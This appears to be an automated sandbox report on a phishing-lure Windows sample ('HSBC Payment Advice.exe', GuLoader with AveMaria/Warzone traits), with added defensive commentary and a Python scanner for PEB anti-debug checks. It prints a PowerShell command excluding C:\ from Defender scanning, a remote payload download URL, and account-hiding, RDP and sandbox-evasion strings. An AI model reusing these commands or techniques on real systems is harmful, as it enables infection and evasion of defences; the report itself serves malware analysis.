               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Process created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
               Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	File created: C:\Users\user\AppData\Local\Microsoft Vision\
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkoahsjv.1ht.ps1
               Source: classification engine	Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@10/6@3/1
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
               Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_01
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	File created: C:\Program Files\Microsoft DN1
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	File read: C:\Windows\System32\drivers\etc\hosts
               Source: Window Recorder	Window detected: More than 3 window changes detected
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Directory created: C:\Program Files\Microsoft DN1

              Data Obfuscation:

               Yara detected GuLoader
               Source: Yara match	File source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp, type: MEMORY
               Source: Yara match	File source: 00000000.00000002.378161921.0000000000710000.00000040.00000001.sdmp, type: MEMORY
               Source: Yara match	File source: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, type: MEMORY
               Yara detected VB6 Downloader Generic
               Source: Yara match	File source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_00402440 push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_00407A43 push ecx; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_00402454 push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_00402468 push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_00407E78 push 4EEBB783h; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_00405679 push ds; iretd
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_0040247C push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_00402418 push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_0040242C push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_004024CC push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_004024E0 push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_004024F4 push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_00402490 push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_00405692 push ds; iretd
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_00408A9F push 3A3ADF06h; retf
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_004024A4 push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_004024B8 push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_004023C8 push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_004023DC push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_004095E9 push ebp; iretd
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_004063EC push ecx; iretd
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_004023FF push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 0_2_004023AF push 0040119Ah; ret
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Code function: 12_2_017B01D0 push ebx; retf
               Source: C:\ProgramData\images.exe	Code function: 28_2_017A1819 push ss; iretd
               Source: C:\ProgramData\images.exe	Code function: 28_2_017A0877 push ds; iretd
               Source: C:\ProgramData\images.exe	Code function: 28_2_017A20E4 push ds; ret
               Source: C:\ProgramData\images.exe	Code function: 28_2_017A1CDB push ss; iretd
               Source: C:\ProgramData\images.exe	Code function: 28_2_017A1C97 push ss; iretd
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	File created: C:\ProgramData\images.exe

              Hooking and other Techniques for Hiding and Protection:

               Contains functionality to hide user accounts
               Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
               Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
               Source: HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
               Source: HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
               Source: HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
               Source: HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
               Hides that the sample has been downloaded from the Internet (zone.identifier)
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Process information set: NOOPENFILEERRORBOX
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
               Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
               Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

               Tries to detect Any.run
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	File opened: C:\Program Files\qga\qga.exe
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	File opened: C:\Program Files\qga\qga.exe
               Source: C:\ProgramData\images.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
               Source: C:\ProgramData\images.exe	File opened: C:\Program Files\qga\qga.exe
               Source: C:\ProgramData\images.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
               Source: C:\ProgramData\images.exe	File opened: C:\Program Files\qga\qga.exe
               Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
               Source: images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=
               Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://SPUREDGE.COM/WARZONE_JBBOXCEY72.BIN
               Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
               Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe TID: 7136	Thread sleep count: 60 > 30
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2868	Thread sleep time: -922337203685477s >= -30000s
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504	Thread sleep time: -922337203685477s >= -30000s
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3055
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information queried: ProcessInformation
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	System information queried: ModuleInformation
               Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
               Source: images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=
               Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
               Source: images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
               Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
               Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
               Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
               Source: images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp	Binary or memory string: vmicvss
               Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://spuredge.com/warzone_JBBOxCEy72.bin
               Source: HSBC Payment Advice.exe, 0000000C.00000002.509564917.0000000001B1F000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
               Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
               Source: HSBC Payment Advice.exe, 0000000C.00000002.509564917.0000000001B1F000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWen-USnm
               Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
               Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
               Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
               Source: images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat
               Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Thread information set: HideFromDebugger
Source: C:\ProgramData\images.exe | Thread information set: HideFromDebugger
Source: C:\ProgramData\images.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\ProgramData\images.exe | Code function: 28_2_017ABD0E mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\images.exe | Code function: 28_2_017A8FAA mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\images.exe | Code function: 28_2_017ADCC3 mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\images.exe | Code function: 28_2_017AC8BB mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\images.exe | Code function: 28_2_017AA3C5 LdrInitializeThunk,
HideFromDebugger is NtSetInformationThread with ThreadHideFromDebugger: an attached debugger stops receiving events from that thread, so an unhandled breakpoint in it terminates the process instead of breaking in. fs:[30h] is the PEB pointer in a 32-bit process; the four loads above sit at 017Axxxx, outside the VB6 image mapped at 400000, i.e. in the unpacked stage, and a PEB load followed by a byte read is the usual PEB.BeingDebugged / NtGlobalFlag check.
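As an added example (not code from Joe Sandbox, the report or the sample), the following Python scans raw 32-bit code for the pattern behind the four `mov eax, dword ptr fs:[00000030h]` hits above: a load of the PEB pointer followed within a few bytes by a read of PEB.BeingDebugged (+0x02) or PEB.NtGlobalFlag (+0x68). The input bytes are constructed for the example; the 24-byte look-ahead window and the opcode list are heuristics chosen here, and the scanner deliberately does not try to recover the ThreadHideFromDebugger call, which needs argument tracking rather than a byte pattern.

```python
import re
from typing import List, Optional, Tuple

# x86 (32-bit) PEB fields behind the classic checks; the offsets differ on x64.
PEB_FIELDS = {0x02: "BeingDebugged", 0x68: "NtGlobalFlag"}
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# `mov r32, dword ptr fs:[30h]`: the EAX-only short form 64 A1 <disp32>, or the general
# 64 8B /r form with a disp32-only ModRM (mod=00, rm=101); the reg bits name the destination.
FS30_LOAD = re.compile(rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x35\x3D\x2D])\x30\x00\x00\x00")

# Opcodes that typically consume the PEB pointer through a [reg+disp8] operand:
# mov r32/r8, test r/m8,imm8, cmp r/m8,imm8, cmp r8,r/m8, cmp r/m8,r8 (plus 0F B6 movzx).
READ_OPCODES = {0x8B, 0x8A, 0xF6, 0x80, 0x3A, 0x38}


def peb_loads(code: bytes) -> List[Tuple[int, int, str]]:
    """(offset, end_offset, register) for every fs:[30h] load in `code`."""
    found = []
    for m in FS30_LOAD.finditer(code):
        seq = m.group(0)
        reg = 0 if seq[1] == 0xA1 else (seq[2] >> 3) & 7
        found.append((m.start(), m.end(), REGS[reg]))
    return found


def field_read_after(code: bytes, start: int, reg: int, window: int = 24) -> Optional[str]:
    """Look a few instructions past the load for a [reg+disp8] read of a known PEB field."""
    i, end = start, min(len(code), start + window)
    while i < end:
        op = code[i]
        if op == 0x0F and i + 1 < end and code[i + 1] == 0xB6:
            modrm_at = i + 2
        elif op in READ_OPCODES:
            modrm_at = i + 1
        else:
            i += 1
            continue
        if modrm_at + 1 >= len(code):
            break
        modrm, disp8 = code[modrm_at], code[modrm_at + 1]
        # mod=01 means [base+disp8]; rm=100 would need a SIB byte, so ESP is never a base here.
        if (modrm >> 6) == 1 and (modrm & 7) == reg and reg != 4 and disp8 in PEB_FIELDS:
            return PEB_FIELDS[disp8]
        i = modrm_at + 2
    return None


def scan_peb_antidebug(code: bytes) -> List[Tuple[int, str, str]]:
    """Pair each PEB load with the field it feeds; loads used for other purposes are skipped."""
    findings = []
    for offset, end, reg_name in peb_loads(code):
        field = field_read_after(code, end, REGS.index(reg_name))
        if field is not None:
            findings.append((offset, reg_name, field))
    return findings


# Constructed sample (not bytes from the report): two classic checks and one benign
# PEB use (walking PEB.Ldr), separated by NOP padding.
SAMPLE = bytes.fromhex(
    "90 90"
    "64 A1 30 00 00 00"      # mov eax, fs:[30h]          ; PEB
    "0F B6 40 02"            # movzx eax, byte [eax+2]    ; PEB.BeingDebugged
    "84 C0 75 05"            # test al, al / jnz
    "90 90 90 90 90"
    "64 8B 0D 30 00 00 00"   # mov ecx, fs:[30h]
    "8B 41 68"               # mov eax, [ecx+68h]         ; PEB.NtGlobalFlag
    "A8 70 75 02"            # test al, 70h / jnz         ; heap flags a debugger sets
    "90 90"
    "64 8B 35 30 00 00 00"   # mov esi, fs:[30h]
    "8B 76 0C"               # mov esi, [esi+0Ch]         ; PEB.Ldr, not an anti-debug read
    "C3"                     # ret
)

if __name__ == "__main__":
    for offset, reg, field in scan_peb_antidebug(SAMPLE):
        print(f"{offset:#06x}: mov {reg}, fs:[30h] followed by a read of PEB.{field}")
```

On the constructed sample the scanner reports the BeingDebugged check at offset 2 and the NtGlobalFlag check at offset 21 and stays silent on the third load, which only walks the loader list. Loads that reach the PEB via the TEB (fs:[18h] then [eax+30h]) are not covered; add a second pattern if the code you are triaging uses that route.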

HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Process created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
Source: C:\ProgramData\images.exe | Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Excluding the root of the system drive turns off Defender scanning for every file under C:\. Add-MpPreference needs administrative rights, so whether the exclusion took effect depends on the token the sample ran with; confirm it from Defender's operational log (event 5007, configuration change) rather than assuming. The two self-launches are the loader starting a fresh copy of itself; the second HSBC Payment Advice.exe instance (process 0000000C) is where the AveMaria Yara matches below are found.
Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmp | Binary or memory strings: uProgram Manager; Shell_TrayWnd; Progman; Progmanlock
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information (VolumeInformation) for:
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll (3x)
C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll
C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll (3x)
C:\
